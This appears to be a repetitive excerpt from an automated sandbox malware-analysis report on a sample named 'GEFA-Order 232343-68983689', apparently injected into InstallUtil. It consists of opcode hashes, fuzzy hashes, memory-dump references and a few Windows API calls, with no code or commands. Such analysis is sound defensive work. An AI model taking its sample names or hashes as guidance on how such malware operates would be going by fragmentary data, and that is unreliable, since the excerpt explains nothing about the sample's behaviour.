                                                              • Opcode ID: be4484ac2244e1b3c5732fad5721aacb2d302e6f49746eb9db72a817e3e2fcd0
                                                              • Instruction ID: 2975e82d754169ef0b5ecd13bc8f3109b9caa678bb2adcabab71d8dab6cba653
                                                              • Opcode Fuzzy Hash: be4484ac2244e1b3c5732fad5721aacb2d302e6f49746eb9db72a817e3e2fcd0
                                                              • Instruction Fuzzy Hash: E6712674E05218CFDB60DFA9E9887ADBBB2FF89304F104069D509A3255DB749E86CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55b201056ef1e5cf737728d29e46f785d0b5bb56fa216373be61fe06ccd3f0e0
                                                              • Instruction ID: 2a02c55c3afb6115c64dc6ba66e182aeff5b0c975245e90d90c9baf17d8b7b8a
                                                              • Opcode Fuzzy Hash: 55b201056ef1e5cf737728d29e46f785d0b5bb56fa216373be61fe06ccd3f0e0
                                                              • Instruction Fuzzy Hash: 857108B0E26219CFDB68DFA9D8447ADBBB5BF8A300F109069D409BB254DB7459C5CF20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d29b0f2fe58155758377601cb4b94ea72622ae7900c7cb149b1f7ecc097c8ed
                                                              • Instruction ID: 482dd52572014fefa0d3b399a9c2653f11ecfe84598089308c414fd143ffd818
                                                              • Opcode Fuzzy Hash: 9d29b0f2fe58155758377601cb4b94ea72622ae7900c7cb149b1f7ecc097c8ed
                                                              • Instruction Fuzzy Hash: 7D716B71D09258CFEB64CF69C8947DABBB2BF9A300F0481EAC049AB252DB345D85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48100e7b74d923a9a99334cb623d0a5fc0a1f733d3dd291c12d8e767d05fd7
                                                              • Instruction ID: 90b5ef968a63f2869008853dad4624894f75fac994a8c35e4a7ad27b0e70cac4
                                                              • Opcode Fuzzy Hash: 2a48100e7b74d923a9a99334cb623d0a5fc0a1f733d3dd291c12d8e767d05fd7
                                                              • Instruction Fuzzy Hash: A5712774E05218CFDB60DFA9D5887ADBBB2FF89304F104069D109A3245DB745E85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0710f608b205e851df3f02985d39685b96b8bf20d233d83a3127453927c2290
                                                              • Instruction ID: dba91cb290be21edf03440c4490d5379256c70386d3346e9f06fe84635172b91
                                                              • Opcode Fuzzy Hash: d0710f608b205e851df3f02985d39685b96b8bf20d233d83a3127453927c2290
                                                              • Instruction Fuzzy Hash: 27611971D09228CFEB64CF69C8547DABBB2BF9A300F1481EAD049AB251DB345D85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8806f0336302b422f21262e0cbc1e7b760145136e046ee6580b5731d144c5
                                                              • Instruction ID: 37a559368f7cff339ff5ca2536e5101e30894f97c300512794ff30ba5d9380c2
                                                              • Opcode Fuzzy Hash: abe8806f0336302b422f21262e0cbc1e7b760145136e046ee6580b5731d144c5
                                                              • Instruction Fuzzy Hash: 8A31E671D056589FEB59CF6B8C0578ABBF6AFC9304F08C1AAC448A6265DB340946CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd

                                                              Execution Graph

                                                              Execution Coverage:9.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:102
                                                              Total number of Limit Nodes:13
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B3CCE2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B3CCE2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05B3F251
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05B3A604), ref: 05B3A83E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738


                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dfd3313f41c2e14e7f06623786a787e176da49a59e68582cd0dd4899ce3708d
                                                              • Instruction ID: 1680ae62cef9e2fe92851d76e3b5ff87e13231ccbb282f95220a0c828788f57c
                                                              • Opcode Fuzzy Hash: 0dfd3313f41c2e14e7f06623786a787e176da49a59e68582cd0dd4899ce3708d
                                                              • Instruction Fuzzy Hash: FD31B070E2020ACFDB25CFA9C45079EBBB2FF85304F50896AE506EB280E7B5D841CB40
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 938acf64fd857122c543b765350be7337f603df3a47f05c8dcd933eab93c1de1
                                                              • Instruction ID: 521e43f095338161b6edefca74d187cc123e3039f41f551165d88e62dc57e783
                                                              • Opcode Fuzzy Hash: 938acf64fd857122c543b765350be7337f603df3a47f05c8dcd933eab93c1de1
                                                              • Instruction Fuzzy Hash: 73414173916385CFC716FF28F8919593BB1BB967043048AADD0414B37EFA70A905CB61
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9df75ae10fdc708c70cb96a3d4e7af3dd15906661906e66de76edde94e22e6d
                                                              • Instruction ID: d6fc5131fcaa17c0672bbafb889e20b16c1830d5ae4a713793a0a516097499c0
                                                              • Opcode Fuzzy Hash: f9df75ae10fdc708c70cb96a3d4e7af3dd15906661906e66de76edde94e22e6d
                                                              • Instruction Fuzzy Hash: AC316034E1064A9BCB19DF69D99469EBBF2FF88300F108519E906E7351EF70AC42CB54
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b6833a7df5341c460594c0f6d6f7ceec4f2958db3a093dd8c3be01df09395bc
                                                              • Instruction ID: a8fc1f66250b80445128c005665f209ced7352070e571aa149ed38ead9c2014b
                                                              • Opcode Fuzzy Hash: 6b6833a7df5341c460594c0f6d6f7ceec4f2958db3a093dd8c3be01df09395bc
                                                              • Instruction Fuzzy Hash: 9741F0B1D00349DFEB14DFA9C884ADEBBF1BF48300F248029E809AB254DB759945CF90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b8bb1c9cdc865a0d462f92f562e3324177e2a621dd2de309ab23269273483e5
                                                              • Instruction ID: 2b336ad0238806247f9cb643909ceada0c0dec99eee86ac7ed987750e0397922
                                                              • Opcode Fuzzy Hash: 8b8bb1c9cdc865a0d462f92f562e3324177e2a621dd2de309ab23269273483e5
                                                              • Instruction Fuzzy Hash: 8F310731A202528FDF22ABBCD4502AD7BF5EF49224F1404B6D505DBA42EB35C856C795
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78a18a04d552332612c0e60e468134480e1ebb51ef06f4ee7ea5a5d97833a2a4
                                                              • Instruction ID: cadc2d181fb1b94983edbe5caa92db34091f2a036da7531227f42ed062f04438
                                                              • Opcode Fuzzy Hash: 78a18a04d552332612c0e60e468134480e1ebb51ef06f4ee7ea5a5d97833a2a4
                                                              • Instruction Fuzzy Hash: E241EFB1D00349DFEB14CFA9C884ADEBBF5FF48310F248029E809AB254DB75A945CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 509eca5cb921619a6ddb78c291484cf6e57bbea6982dc81da572342c0accf078
                                                              • Instruction ID: ec120451d9cfd08b56adda16675da7a4b4d105aaba9d3782ae206024449b80ec
                                                              • Opcode Fuzzy Hash: 509eca5cb921619a6ddb78c291484cf6e57bbea6982dc81da572342c0accf078
                                                              • Instruction Fuzzy Hash: C2317370E2060ADFDB25CFA9C4507AEBBB2FF85304F508969E506EB281E7B5D845CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d9684cda0ba80f3cefd3a87a436a415f64cb5941e9ee97b1601b444586560db
                                                              • Instruction ID: c436fa763ee04b6ed04581ac46ee96e3a666ef1a6f65f49a0f9e6db8708a2eeb
                                                              • Opcode Fuzzy Hash: 4d9684cda0ba80f3cefd3a87a436a415f64cb5941e9ee97b1601b444586560db
                                                              • Instruction Fuzzy Hash: AF212936B00214CFD705EB74D858B6E37B6BB88714B248968D4069B3A8DE759C42DBA0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f89b0a3d1c74d2fe6c40693eb0236fa5170f8c77715284311b24ebd74da367c1
                                                              • Instruction ID: 47bd8d5c16bb4ef956d9f9a84fcf45936cf194c1acbbad87af4a5122a0ab15d0
                                                              • Opcode Fuzzy Hash: f89b0a3d1c74d2fe6c40693eb0236fa5170f8c77715284311b24ebd74da367c1
                                                              • Instruction Fuzzy Hash: E0319571E1020A9BDF06DFA8D4506DEB7B2FF89304F10951AE905EB381EB719881CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d3dd62f2e0a8023745ea69f349c37acd049407d239dd4fb54ec53bca1034d4c
                                                              • Instruction ID: 81d1d38e728849e36d4b873157fa8d85695d4a7a9501957f07f07da8c0addc29
                                                              • Opcode Fuzzy Hash: 5d3dd62f2e0a8023745ea69f349c37acd049407d239dd4fb54ec53bca1034d4c
                                                              • Instruction Fuzzy Hash: D5213675610201CFFB23AB68E88476D37A1EB49300F100E65E106CB76AFB30DC65DBA2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4831f73abbfd0959664b800497bc434331d2bf44a8d1fbaed92f4ef7b36b02ea
                                                              • Instruction ID: 45f26f9eb04de401fb19e1f45749faf5208caebedf4e9d01a98b538903c11d5f
                                                              • Opcode Fuzzy Hash: 4831f73abbfd0959664b800497bc434331d2bf44a8d1fbaed92f4ef7b36b02ea
                                                              • Instruction Fuzzy Hash: 20217631E1020A9BDF15DFA9D49069EF7B2FF89304F10951AF905EB391EB719885CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcf7999e86b1697956842258576e55efaef6a8c6df01bbca13931436cf911a57
                                                              • Instruction ID: 0cf2a3d5877e81fe5d294e53baf22e1fb65d2a1ed0521a7aa54695f5db8a8bc0
                                                              • Opcode Fuzzy Hash: fcf7999e86b1697956842258576e55efaef6a8c6df01bbca13931436cf911a57
                                                              • Instruction Fuzzy Hash: 3A21B630E146069BDF15CFA8C454ADEFBB2BF89314F10852AF915B7381DB709882CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f11a4aab26522ba161cf06db1f7edf8cd379f7714591b550e637efaac20333f8
                                                              • Instruction ID: 9197dc21b8a09a7cc1c6b9bd81e3a2516f62c6daadc4c2dbf5af7675dcbb1669
                                                              • Opcode Fuzzy Hash: f11a4aab26522ba161cf06db1f7edf8cd379f7714591b550e637efaac20333f8
                                                              • Instruction Fuzzy Hash: B221D571A10242CBEB73672CE45432D37A1EB06321F500D69F606CBB82DE29CD69C752
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d1e815783e2fc4b2d13963c5b7fbedb5a23170f9da35bebb7bd975499beeb36
                                                              • Instruction ID: 34d7ff102b7d64ab791f274a507a8d10d3327950aab35aa537ad679cd6f57479
                                                              • Opcode Fuzzy Hash: 9d1e815783e2fc4b2d13963c5b7fbedb5a23170f9da35bebb7bd975499beeb36
                                                              • Instruction Fuzzy Hash: 0A219C30B10246CFEB15EB78C5657AE7BF2AF49301F200468D502EB7A1DB318D11CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1568328101.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_123d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                                              • Instruction ID: 4e92772379af90e0e9667d59318ca89136832ef9441eb043998ab2662271e339
                                                              • Opcode Fuzzy Hash: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                                              • Instruction Fuzzy Hash: 352100B1614348DFDB15DFA4D8C0B26FB65FB84B14F64C569E90A4B282C376D807CA62
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 886845e327e0a1d09ad3feec23c398b9fa2ab3fca74e65c62efde771a248e905
                                                              • Instruction ID: f0fc8919ab7d0098dc40c47d568978f7c22c82d810020765b87dbe8a67536093
                                                              • Opcode Fuzzy Hash: 886845e327e0a1d09ad3feec23c398b9fa2ab3fca74e65c62efde771a248e905
                                                              • Instruction Fuzzy Hash: 35110672A142645FD306AB78D4247EE7FA2EFD6204F1144ABC045CB292EA798845C792
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ba25c109e600a9ee8383c68f6fe7dae062290eb0b9b0db4011f1633c022de9a
                                                              • Instruction ID: acf509e7aac4c45841088e3e96a0d34173ef44c7d29964472b2e6ecafb3148e3
                                                              • Opcode Fuzzy Hash: 6ba25c109e600a9ee8383c68f6fe7dae062290eb0b9b0db4011f1633c022de9a
                                                              • Instruction Fuzzy Hash: 19218030E1060A9BDF19CFA8C454A9EF7B2BF89314F10861AF915B7380EB70A881CB50
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98d7c17393fc12cbd3931c2ccc25693c994d39ec68e615a4133be4b2cd22700e
                                                              • Instruction ID: 81a29ebc92de029e355ddf2c2520f2964f744784fa554e07a3d48e8e0689ae79
                                                              • Opcode Fuzzy Hash: 98d7c17393fc12cbd3931c2ccc25693c994d39ec68e615a4133be4b2cd22700e
                                                              • Instruction Fuzzy Hash: 3B213A31B20205CFEB14EB78C555BAE77F6AF49305F200468D606EB7A5EB359C50CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db7e5bc86cbe42365c9e3d4ce0d15e1585cdc810da886dc5b667445e6751d2c7
                                                              • Instruction ID: 48f2a0b788ff9463f3b3c95862af1644a24453c11f5d86bb83e3bff038abe8f6
                                                              • Opcode Fuzzy Hash: db7e5bc86cbe42365c9e3d4ce0d15e1585cdc810da886dc5b667445e6751d2c7
                                                              • Instruction Fuzzy Hash: E821A579610201CFEB27EB6CE88475D37A5EB48311F104E25E106CB76AFB34E8649BA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1568328101.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_123d000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                                              • Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
                                                              • Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                                              • Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b682d1533dff7414bd51a48f05eb1295e468b63e7ed0b50d57384b9f8b7ccd52
                                                              • Instruction ID: a03f0d9b9bea37ef090ac98c2183f2ae07ab5a3c0e20a0aa92a02e60df5a9320
                                                              • Opcode Fuzzy Hash: b682d1533dff7414bd51a48f05eb1295e468b63e7ed0b50d57384b9f8b7ccd52
                                                              • Instruction Fuzzy Hash: FF112931F24306DFEF225679D8063693394EB46214F10497AF206CF2A2EA65CD458BDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd

                                                              Execution Graph

                                                              Execution Coverage:11%
                                                              Dynamic/Decrypted Code Coverage:98.4%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:511
                                                              Total number of Limit Nodes:56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1590280319.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
